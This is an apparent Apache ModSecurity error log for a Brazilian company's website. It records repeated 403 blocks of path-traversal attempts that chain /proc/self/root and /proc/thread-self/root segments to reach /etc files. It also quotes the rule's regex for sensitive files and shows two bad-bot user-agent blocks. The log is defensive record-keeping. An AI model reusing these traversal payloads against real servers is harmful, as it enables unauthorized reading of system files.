[Tue Mar 17 08:24:22.086325 2026] [:error] [pid 5398:tid 140411666392832] [client 74.7.241.46:44392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk55gRES9pL8P-grjlgiAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:24:55.739799 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:44166] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6B6BJNF7axNlVR0X1PgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:25:14.596577 2026] [:error] [pid 7000:tid 140411699963648] [client 74.7.241.46:54818] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6GhePVOt35XCGZP8mXgAAA4U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:26:00.110478 2026] [:error] [pid 4712:tid 140411632822016] [client 74.7.241.46:55112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6SHQLOys_ArAUsGMJrQAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:26:04.959462 2026] [:error] [pid 662:tid 140411683178240] [client 74.7.241.46:50202] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6TK60egQjobaJUYgH2gAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:26:08.938606 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.241.46:50216] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6UAeiSKl8TjouI-b6nAAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:26:15.261945 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.243.203:47628] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6V5DEJR9VXonE_-1GPgAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:26:20.946760 2026] [:error] [pid 1961:tid 140411658000128] [client 74.7.243.203:45844] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6XHRXaaWotPICgYsdXAAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:26:50.324164 2026] [:error] [pid 1016:tid 140411565680384] [client 74.7.241.46:58694] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6epqmL8PQht4WJFlA9QAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:26:53.966399 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.46:45906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6fQeiSKl8TjouI-b6oAAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:27:01.903712 2026] [:error] [pid 1961:tid 140411590858496] [client 74.7.241.46:45912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6hXRXaaWotPICgYsdegAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:27:03.679865 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.241.46:41004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6h9CmCSWTlPouqorDvgAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:27:04.980209 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.241.46:41010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6iAQohV2v-7oj5HHy1AAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:27:11.596107 2026] [:error] [pid 1210:tid 140411699963648] [client 74.7.241.46:41024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6j1KJy4A1bGlmj9BN8wAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:27:17.355648 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.241.46:37034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6lZDEJR9VXonE_-1GSwAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:27:17.730453 2026] [:error] [pid 32588:tid 140411616036608] [client 74.7.243.203:58648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6lS8PwvOE6ZaeZxiG4wAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:27:48.018597 2026] [:error] [pid 5398:tid 140411599251200] [client 74.7.241.46:52128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6tARES9pL8P-grjlg1gAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:27:52.570690 2026] [:error] [pid 7000:tid 140411725141760] [client 74.7.241.46:49440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6uBePVOt35XCGZP8m4QAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:27:59.263891 2026] [:error] [pid 5398:tid 140411565680384] [client 74.7.243.203:35464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk6vwRES9pL8P-grjlg4QAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:28:04.271222 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.244.31:34518] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk6xNCmCSWTlPouqorDxAAAANc"]
[Tue Mar 17 08:28:18.687332 2026] [:error] [pid 1961:tid 140411632822016] [client 74.7.228.16:55540] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk60nRXaaWotPICgYsdhgAAA00"]
[Tue Mar 17 08:28:40.517183 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.241.46:49454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk66AeiSKl8TjouI-b6zAAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:29:59.017001 2026] [:error] [pid 7000:tid 140411683178240] [client 74.7.241.46:50450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 